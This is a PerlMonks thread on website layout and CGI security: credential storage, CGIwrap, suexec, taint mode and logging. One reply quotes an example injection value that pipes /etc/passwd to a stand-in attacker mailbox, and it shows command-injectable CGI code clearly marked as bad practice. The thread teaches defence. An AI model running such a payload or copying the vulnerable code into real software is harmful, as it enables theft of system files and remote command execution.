Re: Structuring a Web site and security issues
by blue_cowdawg (Monsignor) on Dec 26, 2005 at 17:22 UTC
1. Where do you place your Perl modules/scripts?
2. Where do you place your database log-on info and is it encrypted?
3. What is considered "best practice" if that can even be answered?
The answer to all three questions is: "It depends."
The first question I'd ask myself before answering any of those is: what are the risk factors I am trying to mitigate? What am I trying to protect, and how "valuable" a target is it?
The next factor I look at is what facilities I have at my disposal to help boost my security stance. For instance, the old hosting provider I had for my personal website set up the account's directory structure so that there was one directory tree for all files associated with my account. In other words, any file I put in my account's file space could potentially be in the path of the web server serving up pages and possibly be exposed to a browser.
My current provider structures my file space so that there are actually two file trees, and even my HOME directory is laid out so that the web files are a subdirectory under HOME. That means I can place my home-grown Perl modules somewhere out of the way of a browser, not to mention any configuration files. The result is that none of my CGI scripts ever have information like database logins in the source code itself.
So to answer question #1: if I have my druthers I keep the CGI scripts, with just the essential code, in the cgi-bin. That's just how it has to be unless I have control over the webserver and can tailor it. I keep the modules those scripts depend on elsewhere, out of the normal browsing path, and do something like
use lib qw@ .... path goes here @;
to point to where they are.
To answer #2, I keep my database login info in a configuration file (again outside the browsing path), and lately I've been using XML::Simple to read it in, but there are other ways.
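For example, a rough sketch of that approach; the file path, element names, and credentials here are made up for illustration:
#!/usr/bin/perl
use strict;
use warnings;
use XML::Simple;
use DBI;

# Hypothetical config living outside the web tree, e.g. /home/me/etc/db.xml:
#   <config>
#     <db dsn="dbi:mysql:mydb" user="dbuser" pass="secret" />
#   </config>
my $cfg = XMLin('/home/me/etc/db.xml');

my $dbh = DBI->connect(
    $cfg->{db}{dsn},
    $cfg->{db}{user},
    $cfg->{db}{pass},
    { RaiseError => 1 },
);
Keep the file's permissions tight (0600) so only your account and the web server user can read it.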
I know there are monks out there who will disagree with this statement, but "best practice" is a) in the eye of the beholder and b) dependent on many factors. One of those factors is what facilities you have available to you, and another is to what degree you need to be cautious. Websites I work on that involve financial data are sites I'm much more security-conscious about than, say, my dog club's web page announcing upcoming events. Keep in mind that no matter how securely you set things up, all you are doing is raising the bar; you are never going to keep out someone who is sufficiently motivated and/or knowledgeable about how to circumvent security.
Last thought: there are some things you do have to consider in your coding that you didn't really ask about in the list above.
- Data validation: Make sure any inputs you process aren't going to do things you don't expect.
- File uploads: Treat with care. There are good ways of handling them and bad ways; make sure you understand what you are doing before working with them.
- Injection attacks: Make sure you understand what they are and how they work, and avoid code that is susceptible to them (see the sketch after this list).
- Remote executions: Web applications that allow random users to execute things on your machine are a really bad idea. If you insist on doing that, make sure to take appropriate precautions to avoid malicious activity.
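On the injection point, a small sketch of the usual defense with DBI placeholders; the table, column, and connection details here are purely illustrative:
use strict;
use warnings;
use CGI;
use DBI;

my $cgi = CGI->new;
my $dbh = DBI->connect('dbi:mysql:mydb', 'dbuser', 'secret',
                       { RaiseError => 1 });

my $name = $cgi->param('name');

# BAD: interpolating user input straight into the SQL string
#   "SELECT id, name FROM members WHERE name = '$name'"

# Better: a placeholder lets the driver quote the value for you
my $rows = $dbh->selectall_arrayref(
    'SELECT id, name FROM members WHERE name = ?',
    undef,
    $name,
);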
Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg
Thanks blue_cowdawg for your lengthy answer. There is so much to learn about Unix, servers, permissions, etc.
I've been using CGI::Application::Plugin::Config::Simple to read in my parameters. But tirwhan has me nervous about storing those logins at all.
Data validation ...
Thanks, I'm validating and untainting everything!
File uploads Treat with care.
I've been validating type, size, and then using CGI upload for this. Any other caveats?
Injection attacks...
Using placeholders for everything (I've been a monk long enough to never go without these).
Remote executions Web applications that allow random users to execute things
Do you have an example of this? I don't *think* I'm doing this.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
Handwaving of HTML here...
<p>
Type in the address you want to look up
<input type="text" name="host_to_search_rq">
</p>
with the CGI of:
#
# Stuff left out....
my $hostname=$cgi->param('host_to_search_rq');
system("nslookup $hostname"); #BAD!!! BAD!!! BAD!!!
#
#
First off, it is conceivable that a malicious hax0r has partially compromised your system already and has a script of their own named "nslookup" sitting in your path, so you want to invoke shell commands within your CGI only via fully qualified pathnames to the commands. That still doesn't fully get you off the hook, but it is a good start.
Secondly, not having checked the contents of $hostname and blindly executing the query leaves you open to an injection attack. A malicious induhvidual could enter the string ";cat /etc/passwd | /usr/ucb/Mail hax0rRus@hax0r.org", which then sends them the contents of your /etc/passwd file for a future brute-force attack.
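A rough sketch of a safer version, assuming nslookup lives at /usr/bin/nslookup (adjust the path for your system): validate the input against a whitelist pattern, then call the command in list form so no shell ever sees it.
use strict;
use warnings;
use CGI;

my $cgi      = CGI->new;
my $hostname = $cgi->param('host_to_search_rq') || '';

# Accept only things that look like a hostname: letters, digits,
# dots and hyphens.  The capture also untaints the value under -T.
unless ($hostname =~ /\A([A-Za-z0-9.-]{1,255})\z/) {
    print $cgi->header, $cgi->p('That does not look like a hostname.');
    exit;
}
my $safe_host = $1;

print $cgi->header('text/plain');

# Full path plus list form of system(): nothing in $safe_host can be
# interpreted as shell syntax because no shell is involved.
system('/usr/bin/nslookup', $safe_host) == 0
    or print "nslookup failed: $?\n";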
Another Dumb Idea® that I've actually seen folks
do:
Much handwaving again...
if ( !$cgi->param('command_rq') ) {
    print $cgi->p("input a command: ",
                  $cgi->textfield(-name => "command_rq") );
} else {
    # OH MY GOD!!! DON'T DO THIS!
    open PIPE, $cgi->param('command_rq') . "|"
        or die $!;
    my @results = <PIPE>;
    print $cgi->pre(@results);
}
Talk about asking for trouble!
Just a few ways to crash and burn in the world
of CGI....
Just remember, the web is not the "village"
it used to be any more. It has grown up into a very
large urban area with hookers and muggers on quite a few
of the street corners. You would use caution if you had
to walk through someplace like that in the Real World™
and you certainly wouldn't leave your doors unlocked
there or put valuables out on the front porch. If you can
think of a way to break your own security (and you should try to think of ways), someone else can too.
Peter L. Berghold -- Unix Professional
Peter -at- Berghold -dot- Net; AOL IM redcowdawg Yahoo IM: blue_cowdawg
Re: Structuring a Web site and security issues
by tirwhan (Abbot) on Dec 26, 2005 at 17:24 UTC
If you're trying to get Apache to run under your user id (so that it can access files and directories owned by you), you should take a look at the suexec mechanism. If you're further looking to improve your security, maybe consider running Apache in a chrooted/jailed environment. As for the database logs, you should never log username/password information (unless you're debugging); if you further want to secure your logs, you could write to a named pipe and have another process (running as a different user) read from the pipe and log to a file not readable by your user.
Securing a website properly is a rather large topic and covers lots of areas (network security, host security, programming securely). There are lots of books on the subject though.
A computer is a state machine. Threads are for people who can't program state machines. -- Alan Cox
Thanks tirwhan.
First, I looked at suexec and decided I need to have a real pro set that up for me. Heady stuff indeed.
Secondly, could you recommend some books that you have found helpful? I did read CGI Programming with Perl, but it doesn't go into the detail I'm needing right now.
Lastly, can you tell me where I can find out more about the piping scenario you mention? Sounds like it might be the ticket, but I'd like a bit more of a nudge.
Thanks.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
Heady stuff indeed
:-) Yeah, suexec looks a bit intimidating. Once you get going it's not quite as bad as the docs make out though.
It's not too easy to give book recommendations, because you haven't said what OS you're on, but these are some that I find very valuable on the subject:
These cover different areas, all of them important.
For the pipe, use the mkfifo command to create a pipe somewhere on your filesystem. Set permissions on the pipe to 0640, owned by your logging user (nobody) and a group that nobody does not belong to. You then need to start a process (as a member of the reading group) that reads from the pipe and logs to a file which is inaccessible to nobody. I use socat for this, but it'd be easy to write something yourself.
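Something along these lines would do it; the paths below are made up, and this is only a sketch of the reader side of the scheme described above:
#!/usr/bin/perl
# Run this as a user in the group allowed to read the FIFO; the log
# file itself stays unreadable to the web server user.
use strict;
use warnings;

my $fifo = '/var/log/apache-pipe';            # created with mkfifo, mode 0640
my $log  = '/var/log/private/access.log';     # not readable by "nobody"

while (1) {
    # open() blocks until the writer (Apache) opens its end of the pipe
    open my $in,  '<',  $fifo or die "open $fifo: $!";
    open my $out, '>>', $log  or die "open $log: $!";
    while (my $line = <$in>) {
        print {$out} $line;
    }
    close $out;
    close $in;
    # writer closed the pipe (e.g. on an Apache restart); loop and reopen
}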
This way the nobody user cannot see past logs (though it can sniff logs as they are written). The method has two drawbacks: 1.) The user can delete the pipe and create a file in its stead. If this happens at the same time as an Apache restart, the server will then log to the file, which is readable by the user. 2.) If your second process (the one reading from the pipe) dies, the server cannot write and will fail.
Another alternative is to write logs over the network, though this has its own problems and drawbacks.
A computer is a state machine. Threads are for people who can't program state machines. -- Alan Cox
Re: Structuring a Web site and security issues
by jhourcle (Prior) on Dec 26, 2005 at 18:09 UTC
I've been using CGIwrap for years (probably ~8 now)...
1. I don't think your 'use lib' line is correct. It tells the script to go up a directory, and to try to go up what looks to be the URL path... which are not directories.
On shared systems, I keep my modules in my home directory, and might have a path like '/users/username/lib/perl5/' or similar. (it's outside of the directory that has my CGI scripts, and there's no 'cgiwrap' involved, as that's typically an executable). The folks at the hosting ISP should be able to help you.
2. I keep it in a file w/out group/world read permissions, outside of any location being served by the webserver (which may be in a Perl module, as I don't keep those in a servable location; see the sketch after this list). I don't tend to encrypt them, as the decryption routines (and the necessary seed) are all accessible from the machine, so it's just extra work for me to maintain, with little added security (but see answer to #3).
3. I don't believe there is such a thing as 'best practice'. You have to evaluate each situation differently, and determine what the potential benefits and risks are.
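A small sketch of the "credentials in a module" idea from point 2, with made-up paths and names, kept somewhere like /users/username/lib/perl5 with tight permissions:
package My::DBConfig;
# e.g. /users/username/lib/perl5/My/DBConfig.pm, mode 0600,
# well outside the document root and cgi-bin
use strict;
use warnings;

sub creds {
    return (
        dsn  => 'dbi:mysql:mydb;host=localhost',
        user => 'dbuser',
        pass => 'secret',
    );
}

1;
A script would then pull it in with something like: use lib '/users/username/lib/perl5'; use My::DBConfig; my %db = My::DBConfig::creds();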
Now -- for the comments about CGIwrap itself ... yes, it adds a little overhead to a plain CGI call, so there are tradeoffs (and it's much slower than mod_perl or FastCGI). As for the security issues, the ones I know about are not from the main CGIwrap distribution; they're from a modified version of CGIwrap that was shipped w/ Cobalt Raq servers (Cobalt was later bought by Sun). There was a more recent report of a format string vulnerability about two years ago, but it was unsubstantiated. As with any tool, there are possibilities of misconfiguration (don't allow cgiwrapd to be called from remote subnets)...
The only thing I can think of that might be an issue is that the error messages CGIwrap throws when your system is misconfigured (i.e., telling you that permissions are wrong, etc.) might leak a little too much info to the outside world.
Well, I just found out from Pair that I can't call a CGIwrapped module from my own script. So, I'm outta luck there.
I'm leaning towards placing my instance scripts in a directory on the web side, but having them call my modules located in a directory in my home. For now, until I look at tirwhan's aforementioned piping scheme, I'm thinking of just keeping my config files in the same directory, because I can at least set it to 701.
—Brad "The important work of moving the world forward does not wait to be done by perfect men." George Eliot
I've also been using cgiwrap for a long time, and I loooove it.
The idea of a cgiwrapped module doesn't really make sense. You need to launch your script with cgiwrap, then it will load your modules and you'll be happy.
Instead of building your whole application and trying to figure out CGIwrap at the same time, make a few really simple scripts that test the functionality of CGIwrap. Then, once you've figured out CGIwrap, tackle your application.
Here's what I'd recommend.
Step 1) Make a really dopey whoami script...
#! /usr/bin/perl -w -T
print "Content-type: text/plain\n\n";
print $<;
Depending on your server you might still have to fiddle with the output (HTML tags and such), but the important part is that it's a really simple script that only does one thing, which is print your UID.
Step 2) Make a similarly dopey script that reads your config file. Maybe even a shell script, like this:
#! /bin/bash
echo "Content-type: text/plain"
echo
cat /home/me/myfiles/.config
When you're making the whoami script work, you might struggle with CGIwrap's funny URL convention. Make sure you understand it before you go any further. For example:
If you have a script at /home/me/myfiles/cgi-bin/woot.pl
You'd have to call it as http://myserver/cgi-bin/cgiwrap/me/woot.pl
Your ISP can customise that, and they might even set up helpers to make it easier... Just make sure you understand it.
Good Luck
--Pileofrogs
Re: Structuring a Web site and security issues
by gmccreight (Sexton) on Dec 27, 2005 at 01:55 UTC
From a security standpoint, CGI::Carp qw(fatalsToBrowser) isn't a great idea in production. You should consider logging instead. fatalsToBrowser makes sense during development (quickly see when code fails), but in production it's just another avenue for your website's users to gather information about the internal workings of your site.
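One sketch of the logging alternative, using CGI::Carp's carpout() to send warnings and fatals to a private file instead of the browser (the log path is just an example):
use strict;
use warnings;
use CGI::Carp qw(carpout);

BEGIN {
    # Open a log the outside world cannot read, and route die()/warn()
    # output there instead of exposing it in the browser.
    open(LOG, '>>', '/home/me/logs/cgi-errors.log')
        or die "Cannot open error log: $!";
    carpout(\*LOG);
}
The browser then just sees the server's generic error page, while the details land in your own log.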
Re: Structuring a Web site and security issues
by Your Mother (Archbishop) on Dec 27, 2005 at 07:53 UTC
MySQL in particular has a neat trick for keeping your password and username secure and out of your code entirely (best practice: never hard code passwords). So, if you're using it, check out DBD::mysql and look for mysql_read_default_file. The password (and dbuser and even other MySQL vars) can be in a config file only readable by the user (make its perms 0400 or 0600).
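A small sketch of what that looks like from the Perl side, assuming a my.cnf-style file at a path of your choosing (the path and database name here are invented):
use strict;
use warnings;
use DBI;

# /home/me/.my.cnf, mode 0600, containing:
#   [client]
#   host=localhost
#   user=dbuser
#   password=secret
my $dsn = 'DBI:mysql:database=mydb'
        . ';mysql_read_default_file=/home/me/.my.cnf';

# Leave user and password undef; DBD::mysql reads them from the
# [client] section of the file instead.
my $dbh = DBI->connect($dsn, undef, undef, { RaiseError => 1 });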
[client]
host=localhost
[perl]
host=perlhost
What would the syntax be to have user and password in there as well?
Thanks for the tip.
update
The following did the trick:
[client]
host=xxxxxx
user=yyyyyy
password=zzzzzzz
Re: Structuring a Web site and security issues
by sgifford (Prior) on Dec 27, 2005 at 20:42 UTC
My random snippets of advice:
- Use taint mode (the -T flag). This makes it much harder to shoot yourself in the foot with many types of injection attacks. Look at the options in the DBI module that will allow you to treat SQL data as tainted and SQL statements as dangerous (see the sketch after this list).
- Put your CGI scripts outside of a public_html area, if possible. Just in a cgi-bin directory is fine. Otherwise a small mistake could allow the script's source to be viewed, which could be dangerous if it contains passwords.
- Put your Perl modules in another directory altogether (I call mine cgi-lib), so they can't be executed on their own from cgi-bin or viewed in a public_html directory.
- Make your scripts with passwords readable only by the user the Web server runs as and by you, if possible. This reduces the circumstances under which the passwords can be viewed.
- Make sure the user the Web server runs as doesn't have permission to write anywhere that could be executed, including areas where execution could be turned on in an .htaccess file. That can allow a "write to the filesystem" bug to escalate to a "full control of your Web site" bug.
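On the taint-mode point, a rough sketch of pairing -T with DBI's taint attributes; the DSN and credentials are placeholders:
#!/usr/bin/perl -T
use strict;
use warnings;
use DBI;

my $dbh = DBI->connect(
    'dbi:mysql:mydb', 'dbuser', 'secret',
    {
        RaiseError => 1,
        TaintIn    => 1,   # croak if tainted data reaches SQL or bind values
        TaintOut   => 1,   # mark data fetched from the database as tainted
    },
);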